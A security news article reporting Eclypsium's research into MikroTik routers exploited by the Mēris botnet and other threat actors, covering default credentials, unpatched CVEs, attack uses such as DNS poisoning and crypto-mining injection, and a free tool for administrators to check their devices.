The routers used by the Mēris botnet in a massive distributed denial-of-service (DDoS) attack against Russia’s internet giant Yandex have also been the unwitting platform for numerous cyber-attacks, researchers discovered.
This is due to a persistent vulnerable state that is difficult for organisations to deal with, but easy for threat players to exploit, they explained.
Latvia
Researchers from Eclypsium took a deep look into the small office/home office (SOHO) & internet-of-things (IoT) devices from Latvia-based company MikroTik, which number some 2m in deployments.
Due to the number of devices in use, their high power & numerous known vulnerabilities within them, threat players have been using MikroTik devices for years as the command centre from which to launch numerous attacks, researchers stated.
MikroTik Attack Surface
Eclypsium researchers began exploring the how & why of the weaponization of MikroTik devices in Sept., based on previous research into how TrickBot threat players used compromised routers as command-&-control (C2) infrastructure. Eclypsium analysts found that TrickBot also was able to use MikroTik infrastructure after US Cyber Command successfully disrupted its main infrastructure.
“This made us want to better understand the MikroTik attack surface & how attackers might use them once compromised,” they wrote.
In addition to their power, one of the main reasons MikroTik devices are so popular with attackers is that they are, like many SOHO & IoT devices, ‘vulnerable out of the box.’
Default Credentials
They often come with default credentials of admin/empty password, & even devices that are intended for corporate environments come without default settings for the WAN port, researchers wrote.
Additionally, MikroTik devices often miss out on important firmware patches because their auto-upgrade feature is rarely turned on, “meaning that many devices are simply never updated,” according to Eclypsium.
2018 & 2019
This has allowed CVEs dating back to 2018 & 2019 — 1 of which was used by in the Yandex attack — to remain unpatched on many devices & ripe for exploitation, researchers suggested. The bugs tracked as CVE-2019-3977, CVE-2019-3978, CVE-2018-14847 & CVE-2018-7445 can all lead to pre-authenticated remote code execution (RCE) & a complete takeover of a device.
MikroTik devices also have “an incredibly complex configuration interface” that invites easy mistakes from those setting them up, which allows attackers to easily discover & abuse them over the internet, researchers outlined.
Multiple Cyberattack Situations
“The capabilities demonstrated in these attacks should be a red flag for enterprise security teams,” researchers wrote in a report published Thurs. “The ability for compromised routers to inject malicious content, tunnel, copy or reroute traffic can be used in a variety of highly damaging ways.”
These include the use of DNS ‘poisoning’ to redirect a remote worker’s connection to a malicious website or introduce a machine-in-the-middle attack; the use of well-known techniques & tools to potentially capture sensitive information or steal 2-factor authentication (2FA) credentials; the tunnelling of enterprise traffic to another location; or the injection of malicious content into valid traffic, researchers observed.
Botnet Attack
Then there was the Mēris botnet attack — which happened soon after Eclypsium began its research. Requests used in the DDoS HTTP-pipelining attack on Russia’s internet giant Yandex in Sept. originated from MikroTik networking gear, with attackers exploiting a 2018 bug unpatched in the over 56,000 MikroTik hosts involved in the incident.
Eclypsium also found around 20,000 devices with proxies open, which were injecting different crypto-mining scripts into web pages.
“These devices are both powerful, & as our research shows, often highly vulnerable,” they noted, adding that MikroTik devices, in addition to serving SOHO environments, are regularly used by local Wi-Fi networks, which also attracts attention from attackers, they wrote.
Tool to Mitigate Risk
Researchers used Shodan queries to build a dataset of 300,000 IP addresses vulnerable to at least 1 of the mentioned RCE exploits, & also tracked geographically where the devices were located, finding that they are “particularly widespread,” they wrote.
Researchers found that China, Brazil, Russia, Italy & Indonesia had the most total vulnerable devices, with the US coming in at 8 on the list.
Network Administrators
Eclypsium has created a freely available tool that could allow network administrators to test their devices’ vulnerability, in 3 ways: Identify MikroTik devices with CVEs that would allow the device to be taken over; attempt to log in with a given list of default credentials; & check for indicators of compromise of the Mēris botnet.
The tool works across SSH, WinBox &^ HTTP API protocols, all of which the Mēris malware uses, researchers said. Eclypsium recommended that enterprises using the tool only attempt to log into the MikroTik devices that they own & to take liability for their actions.